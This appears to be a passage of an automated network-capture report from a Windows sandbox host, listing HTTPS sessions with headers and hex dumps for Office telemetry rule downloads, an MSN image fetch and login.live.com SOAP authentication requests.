                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    140192.168.2.74992413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:00 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: e56afb1e-801e-0083-3991-3ff0ae000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080700Z-174f7845968zgtf6hC1EWRqd8s0000000pmg000000005mms
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    141192.168.2.74992513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:00 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1356
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3d9c3aa7-901e-00ac-5891-3fb69e000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080700Z-174f7845968kdththC1EWRzvxn00000008wg00000000ee2t
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    142192.168.2.749926104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC506OUTGET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 16 Nov 2024 01:10:29 GMT
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 822
                                                                                                                                                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                                                                                                                                                    X-ActivityId: 5763b2c5-4e9a-486b-a0ff-57403523bc58
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Length: 4096
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=157146
                                                                                                                                                                                                                                                                                                                    Expires: Fri, 29 Nov 2024 03:46:06 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:00 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC4096INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    143192.168.2.74992713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:01 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 47663499-e01e-0051-6891-3f84b2000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080701Z-174f7845968xr5c2hC1EWRd0hn0000000dgg000000005a61
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    144192.168.2.74992920.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 4775
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:06:02 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C525_BAY
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 97c4c25c-7b7b-457f-b7d0-d4b2b4ec019c
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: PH1PEPF0001B645 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:02 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 11409
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    145192.168.2.74993020.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 4775
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:01 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:06:02 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C531_BAY
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f9319083-676a-4c4f-9456-2078aacdec70
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: PH1PEPF0001B895 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:01 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 1918
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    146192.168.2.74993113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:02 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: ebed6b5e-401e-0015-4f72-400e8d000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080702Z-174f7845968l4kp6hC1EWRe8840000000x00000000000x34
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
